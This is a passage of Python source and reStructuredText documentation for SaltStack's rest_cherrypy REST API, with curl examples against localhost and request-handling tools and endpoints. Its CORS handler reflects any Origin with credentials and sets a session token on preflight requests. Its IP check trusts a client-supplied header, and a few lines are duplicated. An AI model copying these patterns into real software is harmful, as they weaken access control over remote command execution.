-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
from salt.ext import six
from salt.ext.six import BytesIO
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', salt.utils.json.dumps),
('application/x-yaml', functools.partial(
salt.utils.yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
